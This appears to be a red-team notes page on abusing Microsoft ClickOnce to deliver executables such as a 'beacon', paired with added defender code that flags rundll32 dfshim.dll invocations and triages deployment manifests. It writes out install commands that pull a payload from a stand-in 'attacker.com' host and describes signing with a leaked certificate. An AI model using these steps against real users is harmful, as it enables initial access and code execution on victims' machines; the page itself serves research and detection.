# ClickOnce

## Lingo

* **ClickOnce** - a technology used to install/deploy an application. This technology can be used to install just about anything:
  * Google Chrome or other third party applications
  * Microsoft patches, updates
  * .NET programs along with all their dependencies and resources

* **ClickOnce package** - a collection of at least **three** files:
  * `program.exe` - program that is being deployed via ClickOnce (typically that's **.NET assembly**)
  * `program.exe.manifest` - XML manifest that describes executable properties (UAC, dependencies, assembly identity, etc)
  * `program.application` - XML manifest **that describes how ClickOnce provisions this program**, where to find executables and their manifests
 
* **ClickOnce deployment** - a program, along with ClickOnce manifests, that will be deployed with ClickOnce technology (so simply put: `chrome.exe + .application + .exe.manifest`)

## Typical Weaponisation Workflow

Typically, when we set out to weaponise ClickOnce, we first come up with an EXE application and then turn it into a ClickOnce deployment.

In that sense, we can deploy any executable with ClickOnce, as long as the files ClickOnce requires (namely `.application` and `.manifest`) accompany it.

So, simply put:

1. We can compile our own .EXE program (be it a .NET assembly or `beacon.exe` or by abusing an MS Signed EXE)
2. Then generate the required `program.application` and `program.exe.manifest` files
3. Once we have both of these, we could either upload all the files to the Web Server for Online deployment or deliver them offline to the victim (in a container of some sort)

## Testing your Deployments

We can install and uninstall ClickOnce deployments from the command line with the following commands:

- Install a ClickOnce deployment from a local path with:

```
cmd> rundll32.exe dfshim.dll,ShOpenVerbApplication C:\click-beacon\beacon.application
```

- Or install it from URL with:

```
cmd> rundll32.exe dfshim.dll,ShOpenVerbApplication https://attacker.com/beacon.application
```

- And then uninstall with:

```
cmd> rundll32.exe dfshim.dll,ShArpMaintain beacon.application
```
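
From the defender's side, these same command lines are a useful process-creation signal. The following added example (not part of the original page) classifies `rundll32.exe dfshim.dll` invocations by verb and manifest source; the sample command lines are constructed, and the UNC case with its `fileserver` host goes beyond the commands shown above.

```python
import re

# The two dfshim.dll exports shown in the commands above (case-insensitive).
DFSHIM_RE = re.compile(
    r'dfshim(?:\.dll)?"?\s*,\s*(ShOpenVerbApplication|ShArpMaintain)\s+("[^"]+"|\S+)',
    re.IGNORECASE,
)
# Host part of an http(s) URL, skipping optional userinfo.
URL_RE = re.compile(r"https?://(?:[^/@\s]*@)?([^/:\s]+)", re.IGNORECASE)

def classify(cmdline):
    """Return a finding dict for a dfshim ClickOnce invocation, else None."""
    m = DFSHIM_RE.search(cmdline)
    if m is None:
        return None
    verb, target = m.group(1).lower(), m.group(2).strip('"')
    if verb == "sharpmaintain":
        return {"action": "uninstall", "source": None, "host": None, "target": target}
    url = URL_RE.match(target)
    if url:
        # Manifest fetched over the network: record the host for proxy/DNS correlation.
        source, host = "url", url.group(1).lower()
    elif target.startswith("\\\\"):
        # UNC path: manifest is pulled from a remote share.
        source, host = "unc", target[2:].split("\\", 1)[0]
    else:
        source, host = "local", None
    return {"action": "install", "source": source, "host": host, "target": target}

# Constructed process-creation command lines; the first three mirror this page.
SAMPLE_CMDLINES = [
    r"rundll32.exe dfshim.dll,ShOpenVerbApplication C:\click-beacon\beacon.application",
    "rundll32.exe dfshim.dll,ShOpenVerbApplication https://attacker.com/beacon.application",
    "rundll32.exe dfshim.dll,ShArpMaintain beacon.application",
    r'"C:\Windows\System32\rundll32.exe" DFSHIM.DLL, shopenverbapplication "\\fileserver\share\app.application"',
    "rundll32.exe shell32.dll,Control_RunDLL desk.cpl",  # unrelated rundll32 use
]

def findings(cmdlines):
    """Keep only the command lines that invoke the ClickOnce shim."""
    return [f for f in map(classify, cmdlines) if f is not None]

if __name__ == "__main__":
    for finding in findings(SAMPLE_CMDLINES):
        print(finding)
```
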


## ClickOnce provisioning Modes

### Offline only

All ClickOnce manifests and application dependencies are included within an archive (ISO, ZIP), and such a package can be installed offline.

In this mode, only one change will be made to the system:

- A directory containing all package files will be created in: `%LOCALAPPDATA%\Apps\2.0\<Random string>`


### Online or Offline

Marks the package to be deployed either offline (so locally from files), or online through the use of an `.appref-ms` file or by pointing the user to the `http://attacker.com/evil.application` URL.

Whenever the user decides to install such a package, the following changes will be introduced to the system:

- **Registry key**
  * `HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\<key>`
- **Directory & Files**
  * `%APPDATA%\Microsoft\Windows\Start Menu\Programs\<Application Name>\<Application files>`
  * `%LOCALAPPDATA%\Apps\2.0\<Random string>`

For more information, refer to:

- [William Burke - CLICKONCE AND YOU'RE IN](https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf)
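
For triage of a recovered `.application` file, the added example below (not the original author's code) reads the deployment manifest and lists which of the artefact locations above to check. The sample manifest and its `example.*` names are constructed, and mapping `install="true"` to the mode that adds Start Menu and Uninstall entries is an assumption based on Microsoft's deployment manifest schema.

```python
import xml.etree.ElementTree as ET  # for untrusted files prefer the defusedxml package

# Constructed sample deployment manifest (.application); all values are placeholders.
SAMPLE = """<asmv1:assembly xmlns="urn:schemas-microsoft-com:asm.v2"
    xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity name="example.application" version="1.0.0.0"/>
  <deployment install="true">
    <deploymentProvider codebase="https://deploy.example.test/example.application"/>
  </deployment>
  <dependency>
    <dependentAssembly dependencyType="install" codebase="example.exe.manifest" size="1024">
      <assemblyIdentity name="example.exe" version="1.0.0.0"/>
    </dependentAssembly>
  </dependency>
</asmv1:assembly>"""

# Artefact locations as listed on this page.
APPS_DIR = r"%LOCALAPPDATA%\Apps\2.0\<Random string>"
INSTALLED_EXTRA = [
    r"HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\<key>",
    r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\<Application Name>",
]

def triage_manifest(xml_text):
    """Summarise a .application manifest for incident triage."""
    info = {"name": None, "install": False, "provider": None,
            "has_signature": False, "app_manifests": []}
    for el in ET.fromstring(xml_text).iter():
        tag = el.tag.rsplit("}", 1)[-1]          # drop the XML namespace
        if tag == "assemblyIdentity" and info["name"] is None:
            info["name"] = el.get("name")        # first one is the deployment identity
        elif tag == "deployment":
            info["install"] = el.get("install", "false").lower() == "true"
        elif tag == "deploymentProvider":
            info["provider"] = el.get("codebase")  # where updates are fetched from
        elif tag == "dependentAssembly" and el.get("codebase"):
            info["app_manifests"].append(el.get("codebase"))
        elif tag == "Signature":
            info["has_signature"] = True         # block present; not validated here
    # Assumption: install="true" is the mode that adds Start Menu/Uninstall entries.
    info["artefacts"] = [APPS_DIR] + (INSTALLED_EXTRA if info["install"] else [])
    return info

if __name__ == "__main__":
    for key, value in triage_manifest(SAMPLE).items():
        print(f"{key}: {value}")
```
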


## Online Examples

ClickOnce deployments published on my [binary-offensive.com](https://binary-offensive.com):

- 1) Runs calc.exe, online only, wasn't signed, URL:

[https://binary-offensive.com/files/c1/calc1-unsigned/clickonce1.application](https://binary-offensive.com/files/c1/calc1-unsigned/clickonce1.application)

- 2) Runs calc.exe, online only, signed with MSI leaked cert, URL:

[https://binary-offensive.com/files/c1/calc1-signed/clickonce1.application](https://binary-offensive.com/files/c1/calc1-signed/clickonce1.application)

- 3) Runs calc.exe, online and offline, wasn't signed, URL:

[https://binary-offensive.com/files/c2/calc1-unsigned/clickonce1.application](https://binary-offensive.com/files/c2/calc1-unsigned/clickonce1.application)

- 4) Runs calc.exe, online and offline, signed with MSI leaked cert, URL:

[https://binary-offensive.com/files/c2/calc1-signed/clickonce1.application](https://binary-offensive.com/files/c2/calc1-signed/clickonce1.application)


## More Information

More information on ClickOnce & VSTO. Suggested reading, in the order listed below 😎

### Articles:

- [All you need is one - a ClickOnce love story](https://www.netspi.com/blog/technical/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/)
- [ClickOnce twice or thrice - a technique for social engineering and untrusted command execution](https://bohops.com/2017/12/02/clickonce-twice-or-thrice-a-technique-for-social-engineering-and-untrusted-command-execution/)
- [One Click to compromise fun with](https://blog.redxorblue.com/2020/07/one-click-to-compromise-fun-with.html)

### Talks:

- [(slides) ClickOnce And You're In When Appref Ms Abuse Is Operating As Intended](https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf)
- [(whitepaper) ClickOnce And You're In When Appref Ms Abuse Is Operating As Intended](https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf)
- [DEF CON 30 - Nick Powers, Steven Flores – ClickOnce AbUse for Trusted Code Execution](https://www.youtube.com/watch?v=cyHxoKvD8Ck)

### VSTO:

- [Make phishing great again. VSTO office files are the new macro nightmare?](https://medium.com/@airlockdigital/make-phishing-great-again-vsto-office-files-are-the-new-macro-nightmare-e09fcadef010)
- [VSTO: THE PAYLOAD INSTALLER THAT PROBABLY DEFEATS YOUR APPLICATION WHITELISTING RULES](https://bohops.com/2018/01/31/vsto-the-payload-installer-that-probably-defeats-your-application-whitelisting-rules/)

### Tools:

- [ClickOnceHunter](https://github.com/zyn3rgy/ClickonceHunter)
- [AssemblyHunter](https://github.com/0xthirteen/AssemblyHunter)
- [MaliciousClickOnceGenerator](https://github.com/Mr-Un1k0d3r/MaliciousClickOnceGenerator)

### Docs and questions:

- [MSDN - walkthrough - manually deploying a ClickOnce application](https://learn.microsoft.com/en-us/visualstudio/deployment/walkthrough-manually-deploying-a-clickonce-application?view=vs-2019)
- [ClickOnce runtime dfsvc.exe](https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe)

